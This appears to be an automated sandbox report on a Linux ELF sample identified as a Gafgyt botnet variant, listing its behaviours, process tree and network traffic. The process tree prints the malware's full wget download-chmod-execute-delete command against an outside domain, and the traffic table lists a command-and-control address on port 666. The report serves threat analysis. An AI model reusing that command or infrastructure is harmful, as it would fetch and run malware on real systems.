Analysis Overview
SHA256
a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf
Threat Level: Known bad
The file a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf was found to be: Known bad.
Malicious Activity Summary
Gafgyt family
Detected Gafgyt variant
Changes its process name
Executes dropped EXE
Modifies Watchdog functionality
Reads system routing table
Reads system network configuration
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-02 01:17
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Gafgyt family
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-02 01:17
Reported
2024-04-02 01:20
Platform
ubuntu2004-amd64-20240221-en
Max time kernel
146s
Max time network
140s
Command Line
Signatures
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | sshd | /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/..... | /tmp/..... | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/watchdog | N/A | N/A |
| File opened for modification | /dev/misc/watchdog | N/A | N/A |
Reads system routing table
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf | N/A |
Reads system network configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/net/route | /tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/..... | /usr/bin/wget | N/A |
Processes
/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf
[/tmp/a508368a916bcc275163c40126bfdcaa26d5dc3294257356f16799a79ed7eebf.elf]
/bin/sh
[/bin/sh -c wget -q http://gay.energy/.../vivid -O .....;chmod 777 .....;./.....;rm -rf .....]
/usr/bin/wget
[wget -q http://gay.energy/.../vivid -O .....]
/usr/bin/chmod
[chmod 777 .....]
/tmp/.....
[./.....]
/bin/sh
[/bin/sh ./.....]
/usr/bin/rm
[rm -rf .....]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| MD | 85.239.33.129:666 | tcp | |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | gay.energy | udp |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 1.1.1.1:53 | cdn.fwupd.org | udp |
| US | 151.101.194.49:443 | cdn.fwupd.org | tcp |
| US | 1.1.1.1:53 | _http._tcp.security.ubuntu.com | udp |
| US | 1.1.1.1:53 | _https._tcp.deb.nodesource.com | udp |
| US | 1.1.1.1:53 | _http._tcp.nl.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | deb.nodesource.com | udp |
| US | 1.1.1.1:53 | deb.nodesource.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | security.ubuntu.com | udp |
| US | 1.1.1.1:53 | nl.archive.ubuntu.com | udp |
| US | 1.1.1.1:53 | nl.archive.ubuntu.com | udp |
| US | 91.189.91.82:80 | security.ubuntu.com | tcp |
| US | 104.22.4.26:443 | deb.nodesource.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| US | 151.101.194.49:443 | cdn.fwupd.org | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| US | 1.1.1.1:53 | _https._tcp.motd.ubuntu.com | udp |
| US | 1.1.1.1:53 | motd.ubuntu.com | udp |
| US | 1.1.1.1:53 | motd.ubuntu.com | udp |
| IE | 34.254.182.186:443 | motd.ubuntu.com | tcp |
| US | 1.1.1.1:53 | _https._tcp.esm.ubuntu.com | udp |
| US | 1.1.1.1:53 | esm.ubuntu.com | udp |
| US | 1.1.1.1:53 | esm.ubuntu.com | udp |
| US | 91.189.91.46:443 | esm.ubuntu.com | tcp |
| IE | 54.171.230.55:443 | motd.ubuntu.com | tcp |
| IE | 54.217.10.153:443 | motd.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| IE | 34.243.160.129:443 | motd.ubuntu.com | tcp |
| IE | 54.247.62.1:443 | motd.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| NL | 213.136.12.213:80 | nl.archive.ubuntu.com | tcp |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| MD | 85.239.33.129:666 | tcp | |
| US | 1.1.1.1:53 | connectivity-check.ubuntu.com | udp |
| MD | 85.239.33.129:666 | tcp |